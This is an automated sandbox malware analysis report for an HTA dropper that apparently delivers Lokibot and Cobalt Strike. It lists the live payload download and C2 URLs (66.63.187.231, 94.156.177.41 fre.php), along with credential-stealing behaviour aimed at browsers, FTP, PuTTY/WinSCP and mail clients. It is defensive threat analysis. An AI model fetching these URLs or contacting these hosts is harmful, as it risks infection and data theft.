            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 4416, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 2668, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000009.00000002.2881596868.0000000000948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
            Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
            Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
            Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
            Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
            Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: PopPassword9_2_0040D069
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: SmtpPassword9_2_0040D069
            Source: Yara matchFile source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            14
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            2
            Credentials in Registry
            44
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            PowerShell
            Logon Script (Windows)111
            Process Injection
            3
            Obfuscated Files or Information
            Security Account Manager41
            Security Software Discovery
            SMB/Windows Admin Shares11
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
            Software Packing
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput Capture124
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets51
            Virtualization/Sandbox Evasion
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
            Masquerading
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
            Virtualization/Sandbox Evasion
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
            Process Injection
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559253 Sample: goodtoseeuthatgreatthingswi... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 61 198.187.3.20.in-addr.arpa 2->61 75 Suricata IDS alerts for network traffic 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 16 other signatures 2->81 11 mshta.exe 1 2->11         started        14 svchost.exe 1 1 2->14         started        signatures3 process4 dnsIp5 99 Detected Cobalt Strike Beacon 11->99 101 Suspicious powershell command line found 11->101 103 PowerShell case anomaly found 11->103 17 powershell.exe 36 11->17         started        63 127.0.0.1 unknown unknown 14->63 signatures6 process7 dnsIp8 59 66.63.187.231, 49730, 80 ASN-QUADRANET-GLOBALUS United States 17->59 49 C:\Users\user\AppData\Roaming\wininit.exe, PE32 17->49 dropped 51 C:\Users\user\AppData\Local\...\caspol[1].exe, PE32 17->51 dropped 53 C:\Users\user\AppData\...\sg2bcrbf.cmdline, Unicode 17->53 dropped 83 Detected Cobalt Strike Beacon 17->83 85 Drops PE files with benign system names 17->85 87 Powershell drops PE file 17->87 22 wininit.exe 4 17->22         started        25 powershell.exe 21 17->25         started        27 csc.exe 3 17->27         started        30 conhost.exe 17->30         started        file9 signatures10 process11 file12 89 Antivirus detection for dropped file 22->89 91 Detected Cobalt Strike Beacon 22->91 93 Tries to steal Mail credentials (via file registry) 22->93 97 3 other signatures 22->97 32 wininit.exe 22->32         started        37 powershell.exe 23 22->37         started        95 Loading BitLocker PowerShell Module 25->95 55 C:\Users\user\AppData\Local\...\sg2bcrbf.dll, PE32 27->55 dropped 39 cvtres.exe 1 27->39         started        signatures13 process14 dnsIp15 57 94.156.177.41, 49734, 49735, 49737 NET1-ASBG Bulgaria 32->57 47 C:\Users\user\AppData\...\31437F.exe (copy), PE32 32->47 dropped 65 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 32->65 67 Tries to steal Mail credentials (via file / registry access) 32->67 69 Tries to harvest and steal ftp login credentials 32->69 71 Tries to harvest and steal browser information (history, passwords, etc) 32->71 73 Loading BitLocker PowerShell Module 37->73 41 conhost.exe 37->41         started        43 WmiPrvSE.exe 37->43         started        file16 signatures17 process18 process19 45 conhost.exe 41->45         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            goodtoseeuthatgreatthingswithentirethingsgreatfor.hta16%ReversingLabsScript-WScript.Trojan.Asthma
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\wininit.exe100%AviraHEUR/AGEN.1306899
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\caspol[1].exe100%AviraHEUR/AGEN.1306899
            C:\Users\user\AppData\Roaming\wininit.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\caspol[1].exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://66.63.187.231/33/caspol.e0%Avira URL Cloudsafe
            http://66.63.187.231/33/caspol.exeC:0%Avira URL Cloudsafe
            http://94.156.177.41/maxzi/five/fre.php100%Avira URL Cloudmalware
            http://66.63.187.231/33/caspol.exe-LMEMH0%Avira URL Cloudsafe
            http://66.63.187.231/33/caspol.exe100%Avira URL Cloudmalware
            94.156.177.41/maxzi/five/fre.php100%Avira URL Cloudmalware
            http://66.63.187.231/chedvmbusRFCOMMP0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            199.232.210.172
            truefalse
              high
              198.187.3.20.in-addr.arpa
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://66.63.187.231/33/caspol.exetrue
                • Avira URL Cloud: malware
                unknown
                94.156.177.41/maxzi/five/fre.phptrue
                • Avira URL Cloud: malware
                unknown
                http://kbfvzoboss.bid/alien/fre.phpfalse
                  high
                  http://94.156.177.41/maxzi/five/fre.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://alphastand.top/alien/fre.phpfalse
                    high
                    http://alphastand.win/alien/fre.phpfalse
                      high
                      http://alphastand.trade/alien/fre.phpfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.fontbureau.com/designersGwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.com/designers/?wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/bThewininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designers?wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.ibsensoftware.com/wininit.exe, wininit.exe, 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.1703477711.0000000006417000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/pscore6lBiqpowershell.exe, 00000001.00000002.1813801603.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701805995.00000000053B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.tiro.comwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://g.live.com/odclientsettings/ProdV2.C:edb.log.7.drfalse
                                          high
                                          http://66.63.187.231/33/caspol.exe-LMEMHpowershell.exe, 00000001.00000002.1825901541.000000000787F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designerswininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.goodfont.co.krwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://go.microspowershell.exe, 00000003.00000002.1701805995.0000000005894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.sajatypeworks.comwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.typography.netDwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://g.live.com/odclientsettings/Prod.C:edb.log.7.drfalse
                                                      high
                                                      http://www.founder.com.cn/cn/cThewininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.galapagosdesign.com/staff/dennis.htmwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://g.live.com/odclientsettings/ProdV2edb.log.7.drfalse
                                                            high
                                                            https://contoso.com/powershell.exe, 00000003.00000002.1703477711.0000000006417000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1823008559.0000000005D67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703477711.0000000006417000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/DPleasewininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://66.63.187.231/33/caspol.epowershell.exe, 00000001.00000002.1813801603.0000000004E57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.fonts.comwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.krwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.microsoft.cpowershell.exe, 00000003.00000002.1704693540.0000000007AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.urwpp.deDPleasewininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.zhongyicts.com.cnwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1813801603.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701805995.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.sakkal.comwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000007.00000003.1771055791.0000024C1B2C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                                                                  high
                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1823008559.0000000005D67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703477711.0000000006417000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.apache.org/licenses/LICENSE-2.0wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.fontbureau.comwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1704999320.0000000007B60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://go.micropowershell.exe, 00000001.00000002.1813801603.0000000004E57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.1703477711.0000000006417000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.ver)svchost.exe, 00000007.00000002.2883796438.0000024C1B400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.microsoft.powershell.exe, 00000003.00000002.1704693540.0000000007AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1704999320.0000000007B60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.carterandcone.comlwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.fontbureau.com/designers/cabarga.htmlNwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.founder.com.cn/cnwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.fontbureau.com/designers/frere-user.htmlwininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000007.00000003.1771055791.0000024C1B2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.jiyu-kobo.co.jp/wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.fontbureau.com/designers8wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://66.63.187.231/chedvmbusRFCOMMPpowershell.exe, 00000001.00000002.1825901541.000000000787F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://66.63.187.231/33/caspol.exeC:powershell.exe, 00000001.00000002.1825901541.000000000781F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          66.63.187.231
                                                                                                                          unknownUnited States
                                                                                                                          8100ASN-QUADRANET-GLOBALUStrue
                                                                                                                          94.156.177.41
                                                                                                                          unknownBulgaria
                                                                                                                          43561NET1-ASBGtrue
                                                                                                                          IP
                                                                                                                          127.0.0.1
                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1559253
                                                                                                                          Start date and time:2024-11-20 10:56:08 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 6m 51s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:16
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.expl.evad.winHTA@20/27@1/3
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 50%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          • Number of executed functions: 78
                                                                                                                          • Number of non-executed functions: 14
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .hta
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.85.23.206, 40.69.42.241, 4.245.163.56, 4.175.87.197
                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 6668 because it is empty
                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7068 because it is empty
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • VT rate limit hit for: goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
                                                                                                                          TimeTypeDescription
                                                                                                                          04:56:59API Interceptor75x Sleep call for process: powershell.exe modified
                                                                                                                          04:57:08API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                          04:57:09API Interceptor114x Sleep call for process: wininit.exe modified
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          66.63.187.231PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                          • 66.63.187.231/33/caspol.exe
                                                                                                                          seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                          • 66.63.187.231/657/caspol.exe
                                                                                                                          PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                          • 66.63.187.231/xampp/noc/seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
                                                                                                                          94.156.177.41PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                          • 94.156.177.41/maxzi/five/fre.php
                                                                                                                          ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                                                                                                                          • 94.156.177.41/simple/five/fre.php
                                                                                                                          greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                          • 94.156.177.41/simple/five/fre.php
                                                                                                                          Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                          • 94.156.177.41/simple/five/fre.php
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          bg.microsoft.map.fastly.netMyInstaller_PDFGear.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 199.232.210.172
                                                                                                                          PO-000041492.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          • 199.232.214.172
                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                          • 199.232.214.172
                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 199.232.210.172
                                                                                                                          Benefit Enrollment -wZ5nusm.pdfGet hashmaliciousUnknownBrowse
                                                                                                                          • 199.232.214.172
                                                                                                                          6GvQSVIEIu.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 199.232.210.172
                                                                                                                          Benefit Enrollment -eGz8VNb.pdfGet hashmaliciousUnknownBrowse
                                                                                                                          • 199.232.214.172
                                                                                                                          217469812STM.pdfGet hashmaliciousScreenConnect Tool, PhisherBrowse
                                                                                                                          • 199.232.210.172
                                                                                                                          file.exeGet hashmaliciousRemcosBrowse
                                                                                                                          • 199.232.214.172
                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                          • 199.232.210.172
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          ASN-QUADRANET-GLOBALUS________.exeGet hashmaliciousQuasarBrowse
                                                                                                                          • 155.94.209.8
                                                                                                                          PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                          • 66.63.187.231
                                                                                                                          ________.exeGet hashmaliciousQuasarBrowse
                                                                                                                          • 69.174.98.113
                                                                                                                          seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                          • 66.63.187.231
                                                                                                                          PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                          • 66.63.187.231
                                                                                                                          RFQ541634_A_URGENT_QUOTATION_SHENLE.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 64.188.27.210
